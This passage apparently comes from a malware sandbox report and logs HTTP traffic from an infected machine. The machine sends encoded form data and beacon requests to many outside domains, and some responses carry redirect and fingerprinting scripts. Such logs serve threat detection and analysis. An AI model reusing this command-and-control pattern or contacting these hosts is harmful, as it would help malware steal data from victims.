Dec 3, 2024 18:59:08.841308117 CET | 5352 | OUT | Data Raw: 67 6f 41 4b 4d 32 7a 33 67 79 45 4a 73 52 46 4d 4e 5a 73 6f 46 2f 67 71 52 4d 35 37 70 67 46 54 45 71 48 39 72 47 59 75 65 74 6b 53 38 70 7a 39 4e 55 6e 32 56 50 34 49 4c 33 66 4b 32 68 30 5a 30 34 56 4e 41 46 76 4a 6c 71 48 46 4f 4a 35 56 74 49
                                                                            Data Ascii: goAKM2z3gyEJsRFMNZsoF/gqRM57pgFTEqH9rGYuetkS8pz9NUn2VP4IL3fK2h0Z04VNAFvJlqHFOJ5VtIhh0EMo+NkZvcC/2qmfXjzYdAPuYldOIEDhIbQ9rqh/qoxTyBua+HpLpCxl7LuuOKiGH4z3hU5N6qBtWw9aD/4I4uveTQ9vVEezFAN/cbHmVPzgUIoisj+jJPFJXDd+UXFrnrUkSf+ohbjE1zDsp9BANw4S3VD7b/o
Dec 3, 2024 18:59:09.041454077 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:08 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49814 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:11.558384895 CET | 488 | OUT | GET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:59:11.752849102 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:11 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.11.20 | 49815 | 23.225.159.42 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:16.949727058 CET | 6 | OUT | Data Raw: 50 4f 53 54
                                                                            Data Ascii: POST
Dec 3, 2024 18:59:17.135812044 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
Dec 3, 2024 18:59:17.136059999 CET | 751 | OUT | Data Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.11.20 | 49816 | 23.225.159.42 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:19.668977022 CET | 6 | OUT | Data Raw: 50 4f 53 54
                                                                            Data Ascii: POST
Dec 3, 2024 18:59:19.855665922 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
Dec 3, 2024 18:59:19.855923891 CET | 771 | OUT | Data Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.11.20 | 49817 | 23.225.159.42 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:22.387367964 CET | 6 | OUT | Data Raw: 50 4f 53 54
                                                                            Data Ascii: POST
Dec 3, 2024 18:59:22.574327946 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:59:22.574650049 CET | 2578 | OUT
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca
                                                                            Dec 3, 2024 18:59:22.574721098 CET | 5342 | OUT
                                                                            Data Ascii: Zsm+ggj9qUVY8oOFh72hgPmXXp+rr3ZR4iQTVjqcJMUJ2BI/ZToCTCjabDNCERWMoU90yjtOBkMna0MNMLH5fYs9AwhBMgY3jGoV5RVZDyZuP1THFYhVJ7thHyXdJMRwHCuOfFQTl2jNZryRpd/gOsxIlPphoYURRWmGk1jeTX3oMDKCf6J/lv3Rqc/3/xFzwn5zMGGlxDvmjjEKG3SOH06Zo6eDJhP1T0jJHuoOMw4vNr3vRT8


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            65 | 192.168.11.20 | 49818 | 23.225.159.42 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:25.104075909 CET | 6 | OUT | GET
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Dec 3, 2024 18:59:25.291847944 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:59:25.292212009 CET | 482 | OUT
                                                                            Data Ascii: /n2c9/?2O=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            66 | 192.168.11.20 | 49819 | 46.30.211.38 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:30.744817019 CET | 761 | OUT | POST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
                                                                            Dec 3, 2024 18:59:30.997912884 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:30 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            67 | 192.168.11.20 | 49820 | 46.30.211.38 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:33.511087894 CET | 781 | OUT | POST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
                                                                            Dec 3, 2024 18:59:33.749625921 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            68 | 192.168.11.20 | 49821 | 46.30.211.38 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:36.295120001 CET | 2578 | OUT | POST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O= [TRUNCATED]
                                                                            Dec 3, 2024 18:59:36.295198917 CET | 5352 | OUT
                                                                            Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
                                                                            Dec 3, 2024 18:59:36.547761917 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            69 | 192.168.11.20 | 49822 | 46.30.211.38 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:39.056277990 CET | 488 | OUT | GET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:59:39.297710896 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            70 | 192.168.11.20 | 49823 | 103.224.182.242 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:44.504518032 CET | 749 | OUT | POST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
                                                                            Dec 3, 2024 18:59:44.713715076 CET | 871 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:44 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248784.2117578; expires=Fri, 01-Dec-2034 17:59:44 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            71 | 192.168.11.20 | 49824 | 103.224.182.242 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:47.222424030 CET | 769 | OUT | POST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
                                                                            Dec 3, 2024 18:59:47.416393995 CET | 871 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:47 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248787.4845084; expires=Fri, 01-Dec-2034 17:59:47 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            72 | 192.168.11.20 | 49825 | 103.224.182.242 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:49.940721035 CET | 1289 | OUT | POST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:59:49.940784931 CET | 5156 | OUT |
                                                                            Data Ascii: uWgvxVD08XZPQoMzK0Foe6e4ncSQtejuK6/l6GW6yBj70o4EWl+9da3Pn0Sph+20/nb988lhtilYdvuaXQqQd4QFoQB+iiVVhx/ujNjPtxbftgALAuc888ISkw9RjrbQsGqy7oGNA0KEi90MwmgNxCcyG2yzUS9W/Prd+5OjWN0ZS3QbLugiRpPNyVsRhwPOxFQJVqc70tWWvTZmF+ecOBy0hgOFAQCUzpKg+8Ll2GaOkjLtakV
                                                                            Dec 3, 2024 18:59:49.940841913 CET | 1473 | OUT |
                                                                            Data Ascii: D6sfLLqhAAZuWTvEPSYViWVRxfP+hPG8oXWMqtzYLGtUV+Yo5R80PjlqnjFYuTceD3l6ih+o0m2YgnEJh6DzDbYunktoTgPlUoF7tWq/ZbQIfSVSqeh5PTx55NDnUGnvkBq8bNAW9wJixpWYfYJMLWUUHylWudfPegjizVz6uiK173c6Tm5F8h6VIp3DeZmM64TzSsPp6JKLHHZtHnZDdQKGRTiL7DWUW+FFEfUQGu8e3q0Rdng
                                                                            Dec 3, 2024 18:59:50.135205984 CET | 871 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:50 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248790.1701818; expires=Fri, 01-Dec-2034 17:59:50 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            73 | 192.168.11.20 | 49826 | 103.224.182.242 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:52.657898903 CET | 484 | OUT | GET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:59:52.856648922 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:52 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248792.6393748; expires=Fri, 01-Dec-2034 17:59:52 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-length: 1457
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http: [TRUNCATED]
                                                                            Dec 3, 2024 18:59:52.856698036 CET | 440 | IN |
                                                                            Data Ascii: .madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; URL=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            74 | 192.168.11.20 | 49827 | 149.88.81.190 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:59:58.213764906 CET | 749 | OUT | POST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm//D2uyceFqDi4C1fpiXIIcs3hEDctxTSnQ==
                                                                            Dec 3, 2024 18:59:58.550810099 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:59:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            75 | 192.168.11.20 | 49828 | 149.88.81.190 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 19:00:01.081337929 CET | 769 | OUT | POST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
